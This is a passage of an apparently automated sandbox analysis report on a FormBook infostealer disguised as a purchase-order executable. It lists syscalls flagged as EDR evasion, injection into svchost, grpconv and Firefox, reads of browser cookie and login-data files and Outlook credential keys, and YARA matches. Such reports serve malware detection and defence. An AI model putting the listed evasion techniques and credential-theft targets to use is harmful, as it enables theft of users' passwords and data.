            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]2_2_0372CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]2_2_0372CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]2_2_0372CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]2_2_0372CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]2_2_0372CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]2_2_0372CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CF50 mov eax, dword ptr fs:[00000030h]2_2_0376CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D0F50 mov eax, dword ptr fs:[00000030h]2_2_037D0F50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F40 mov eax, dword ptr fs:[00000030h]2_2_037B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F40 mov eax, dword ptr fs:[00000030h]2_2_037B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F40 mov eax, dword ptr fs:[00000030h]2_2_037B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F40 mov eax, dword ptr fs:[00000030h]2_2_037B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4F42 mov eax, dword ptr fs:[00000030h]2_2_037D4F42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EF28 mov eax, dword ptr fs:[00000030h]2_2_0375EF28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732F12 mov eax, dword ptr fs:[00000030h]2_2_03732F12
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804FE7 mov eax, dword ptr fs:[00000030h]2_2_03804FE7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CF1F mov eax, dword ptr fs:[00000030h]2_2_0376CF1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E6F00 mov eax, dword ptr fs:[00000030h]2_2_037E6F00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770FF6 mov eax, dword ptr fs:[00000030h]2_2_03770FF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770FF6 mov eax, dword ptr fs:[00000030h]2_2_03770FF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770FF6 mov eax, dword ptr fs:[00000030h]2_2_03770FF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770FF6 mov eax, dword ptr fs:[00000030h]2_2_03770FF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E6FF7 mov eax, dword ptr fs:[00000030h]2_2_037E6FF7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374CFE0 mov eax, dword ptr fs:[00000030h]2_2_0374CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374CFE0 mov eax, dword ptr fs:[00000030h]2_2_0374CFE0
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtClose: Direct from: 0x77762B6C
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\grpconv.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: NULL target: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: NULL target: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\grpconv.exeThread register set: target process: 7936Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\grpconv.exeThread APC queued: target process: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2A5B008Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe"Jump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeProcess created: C:\Windows\SysWOW64\grpconv.exe "C:\Windows\SysWOW64\grpconv.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: Purchase Order_ AEPL-2324-1126.exe, JkyHsYXxoyjW.exe, 00000003.00000002.3864797915.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000003.00000000.1519795840.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3865099185.0000000001290000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: svchost.exe, 00000002.00000003.1596207588.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1596658465.0000000003024000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594446965.000000000301B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FSoftware\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders".lnk%HOMEDRIVE%%HOMEPATH%.pif%USERPROFILE%setup.iniprogman.groupsprogman.onlydesktop.groupsstartup.groupssendto.groupsrecentdocs.groupsSoftware\Microsoft\Windows\CurrentVersionPreConvRenameFilesDeleteFilesRenameFilesSoftware\Microsoft\Windows\CurrentVersion\GrpConv/o-o.grpExceptionReturnHrLogHrFailFast%hs(%u)\%hs!%p: %hs!%p: (caller: %p) %hs(%d) tid(%x) %08X %ws Msg:[%ws] CallContext:[%hs] [%hs(%hs)]
            Source: JkyHsYXxoyjW.exe, 00000003.00000002.3864797915.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000003.00000000.1519795840.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3865099185.0000000001290000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: JkyHsYXxoyjW.exe, 00000003.00000002.3864797915.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000003.00000000.1519795840.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3865099185.0000000001290000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
            Source: JkyHsYXxoyjW.exe, 00000003.00000002.3864797915.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000003.00000000.1519795840.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3865099185.0000000001290000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: Purchase Order_ AEPL-2324-1126.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: svchost.exe, 00000002.00000003.1596658465.000000000302E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594446965.000000000301B000.00000004.00000020.00020000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000003.00000002.3863139699.0000000000868000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FileDescriptionWindows Progman Group Converterh$
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1627616041.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3868781566.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1628046718.0000000003640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3868947164.0000000004200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3858711840.00000000002D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3871192963.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1628574210.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3865120217.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\grpconv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\grpconv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\grpconv.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Purchase Order_ AEPL-2324-1126.exeBinary or memory string: WIN_XP
            Source: Purchase Order_ AEPL-2324-1126.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: Purchase Order_ AEPL-2324-1126.exeBinary or memory string: WIN_XPe
            Source: Purchase Order_ AEPL-2324-1126.exeBinary or memory string: WIN_VISTA
            Source: Purchase Order_ AEPL-2324-1126.exeBinary or memory string: WIN_7
            Source: Purchase Order_ AEPL-2324-1126.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1627616041.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3868781566.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1628046718.0000000003640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3868947164.0000000004200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3858711840.00000000002D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3871192963.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1628574210.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3865120217.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
